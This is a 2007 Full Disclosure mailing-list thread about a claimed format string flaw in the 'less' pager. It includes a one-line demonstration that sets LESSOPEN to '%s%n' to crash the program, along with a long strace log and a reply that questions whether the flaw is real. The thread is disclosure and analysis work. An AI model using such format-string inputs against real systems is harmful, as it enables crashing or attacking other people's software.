Full Disclosure mailing list archives
Re: [+] Vulnerability in less version 394 and prior
From: glopeda.com <glopeda () glopeda com>
Date: Wed, 31 Oct 2007 08:02:30 -0400
It's taking arguments out of your environment for the format string, put a couple more %n's and watch it die horribly. That's why I said "a meager demonstration." The emphasis was definitely on meager ;) On 10/31/07, Jeffrey Denton <dentonj () gmail com> wrote:
On 10/31/07, glopeda. com <glopeda () glopeda com> wrote:From: glopeda () glopeda com Application: less 394 and prior Type: Format strings vulnerability Priority: LowMeager demonstration: $ export LESSOPEN=%s%n $ less somefile Segmentation fault $Interesting... $ echo $LESSOPEN |lesspipe.sh %s $ export LESSOPEN=%s%n $ less iptraf.txt /bin/bash: ./iptraf.txt: Permission denied : No such file or directory $ less --version less 394 Copyright (C) 1984-2005 Mark Nudelman less comes with NO WARRANTY, to the extent permitted by law. For information about the terms of redistribution, see the file named README in the less distribution. Homepage: http://www.greenwoodsoftware.com/less $ id uid=1000(dentonj) gid=100(users) groups=11(floppy),17(audio),18(video),19(cdrom),83(plugdev),100(users) $ ls -l iptraf.txt -rw-r--r-- 1 dentonj users 300 2007-10-25 08:04 iptraf.txt $ echo $LESSOPEN %s%n $ cat /etc/slackware-version Slackware 12.0.0 $ strace /usr/bin/less iptraf.txt execve("/usr/bin/less", ["/usr/bin/less", "iptraf.txt"], [/* 47 vars */]) = 0 brk(0) = 0x8065000 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7efb000 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory) open("/etc/ld.so.cache", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=111039, ...}) = 0 mmap2(NULL, 111039, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7edf000 close(3) = 0 open("/lib/libncursesw.so.5", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\352"..., 512) = 512 fstat64(3, {st_mode=S_IFREG|0755, st_size=309276, ...}) = 0 mmap2(NULL, 311172, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e93000 mmap2(0xb7ed7000, 32768, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x43) = 0xb7ed7000 close(3) = 0 open("/lib/libc.so.6", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@_\1\000"..., 512) = 512 fstat64(3, {st_mode=S_IFREG|0755, st_size=1528742, ...}) = 0 mmap2(NULL, 1316260, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7d51000 mmap2(0xb7e8d000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x13c) = 0xb7e8d000 mmap2(0xb7e90000, 9636, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e90000 close(3) = 0 open("/lib/libdl.so.2", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0P\n\0\000"..., 512) = 512 fstat64(3, {st_mode=S_IFREG|0755, st_size=13506, ...}) = 0 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7d4d000 mmap2(0xb7d4f000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1) = 0xb7d4f000 close(3) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d4c000 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d4c8d0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 mprotect(0xb7e8d000, 4096, PROT_READ) = 0 munmap(0xb7edf000, 111039) = 0 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) = 0 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) = 0 brk(0) = 0x8065000 brk(0x8086000) = 0x8086000 stat64("/home/dentonj/.terminfo", 0xbfc67624) = -1 ENOENT (No such file or directory) stat64("/usr/share/terminfo", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 access("/usr/share/terminfo/x/xterm", R_OK) = 0 open("/usr/share/terminfo/x/xterm", O_RDONLY|O_LARGEFILE) = 3 read(3, "\32\0010\0&\0\17\0\235\1F\5xterm|xterm terminal"..., 4097) = 2522 close(3) = 0 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) = 0 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) = 0 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) = 0 ioctl(1, TIOCGWINSZ, {ws_row=25, ws_col=80, ws_xpixel=0, ws_ypixel=0}) = 0 ioctl(2, TIOCGWINSZ, {ws_row=25, ws_col=80, ws_xpixel=0, ws_ypixel=0}) = 0 open("/usr/bin/.sysless", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory) open("/etc/sysless", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory) open("/home/dentonj/.less", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory) open("/usr/lib/locale/locale-archive", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory) open("/usr/share/locale/locale.alias", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=2586, ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7efa000 read(3, "# Locale name alias data base.\n#"..., 4096) = 2586 read(3, "", 4096) = 0 close(3) = 0 munmap(0xb7efa000, 4096) = 0 open("/usr/lib/locale/en_US/LC_IDENTIFICATION", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=378, ...}) = 0 mmap2(NULL, 378, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7efa000 close(3) = 0 open("/usr/lib/locale/en_US/LC_MEASUREMENT", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=28, ...}) = 0 mmap2(NULL, 28, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef9000 close(3) = 0 open("/usr/lib/locale/en_US/LC_TELEPHONE", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=64, ...}) = 0 mmap2(NULL, 64, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef8000 close(3) = 0 open("/usr/lib/locale/en_US/LC_ADDRESS", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=160, ...}) = 0 mmap2(NULL, 160, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef7000 close(3) = 0 open("/usr/lib/locale/en_US/LC_NAME", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=82, ...}) = 0 mmap2(NULL, 82, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef6000 close(3) = 0 open("/usr/lib/locale/en_US/LC_PAPER", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=39, ...}) = 0 mmap2(NULL, 39, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef5000 close(3) = 0 open("/usr/lib/locale/en_US/LC_MESSAGES", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 close(3) = 0 open("/usr/lib/locale/en_US/LC_MESSAGES/SYS_LC_MESSAGES", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=57, ...}) = 0 mmap2(NULL, 57, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef4000 close(3) = 0 open("/usr/lib/locale/en_US/LC_MONETARY", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=291, ...}) = 0 mmap2(NULL, 291, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef3000 close(3) = 0 open("/usr/lib/locale/en_US/LC_TIME", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=2459, ...}) = 0 mmap2(NULL, 2459, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef2000 close(3) = 0 open("/usr/lib/locale/en_US/LC_NUMERIC", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=59, ...}) = 0 mmap2(NULL, 59, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef1000 close(3) = 0 open("/usr/lib/locale/en_US/LC_CTYPE", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=207720, ...}) = 0 mmap2(NULL, 207720, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7d19000 close(3) = 0 open("/home/dentonj/.lesshst", O_RDONLY|O_LARGEFILE) = 3 fstat64(3, {st_mode=S_IFREG|0600, st_size=54, ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef0000 read(3, ".less-history-file:\n.search\n\"rc\n"..., 4096) = 54 read(3, "", 4096) = 0 close(3) = 0 munmap(0xb7ef0000, 4096) = 0 open("/dev/tty", O_RDONLY|O_LARGEFILE) = 3 ioctl(3, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) = 0 fsync(3) = -1 EINVAL (Invalid argument) ioctl(3, SNDCTL_TMR_STOP or TCSETSW, {B38400 opost isig -icanon -echo ...}) = 0 rt_sigaction(SIGINT, {0x805a220, [INT], SA_RESTART}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGTSTP, {0x805a260, [TSTP], SA_RESTART}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGWINCH, {0x805a2a0, [WINCH], SA_RESTART}, {SIG_DFL}, 8) = 0 pipe([4, 5]) = 0 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d4c918) = 10823 close(5) = 0 fstat64(4, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef0000 read(4, /bin/bash: ./iptraf.txt: Permission denied "", 1024) = 0 close(4) = 0 waitpid(10823, [{WIFEXITED(s) && WEXITSTATUS(s) == 126}], 0) = 10823 --- SIGCHLD (Child exited) @ 0 (0) --- munmap(0xb7ef0000, 4096) = 0 stat64(" ", 0xbfc68e10) = -1 ENOENT (No such file or directory) stat64(" ", 0xbfc68e90) = -1 ENOENT (No such file or directory) open("/usr/share/locale/en_US/LC_MESSAGES/libc.mo", O_RDONLY) = -1 ENOENT (No such file or directory) open("/usr/share/locale/en/LC_MESSAGES/libc.mo", O_RDONLY) = -1 ENOENT (No such file or directory) open("/home/dentonj/.lesshst", O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE, 0666) = 4 fchmod(4, 0600) = 0 fstat64(4, {st_mode=S_IFREG|0600, st_size=0, ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef0000 write(4, ".less-history-file:\n.search\n\"rc\n"..., 54) = 54 close(4) = 0 munmap(0xb7ef0000, 4096) = 0 write(2, "\n: No such file or directory\n", 29 : No such file or directory ) = 29 fsync(3) = -1 EINVAL (Invalid argument) ioctl(3, SNDCTL_TMR_STOP or TCSETSW, {B38400 opost isig icanon echo ...}) = 0 exit_group(1) = ? Process 10822 detached $ $ chmod 755 iptraf.txt $ less iptraf.txt ./iptraf.txt: line 1: 10.1.1.1:33073: command not found ./iptraf.txt: line 2: 10.1.1.2:54356: command not found . . . _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-- Site: http://www.glopeda.com E-mail: glopeda () glopeda com Name: Mitch _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- [+] Vulnerability in less version 394 and prior glopeda . com (Oct 30)
- Re: [+] Vulnerability in less version 394 and prior fdlist (Oct 30)
- Re: [+] Vulnerability in less version 394 and prior Jonathan Smith (Oct 30)
- Message not available
- Re: [+] Vulnerability in less version 394 and prior Jeffrey Denton (Oct 31)
- Re: [+] Vulnerability in less version 394 and prior glopeda . com (Oct 31)
- Re: [+] Vulnerability in less version 394 and prior Jeffrey Denton (Oct 31)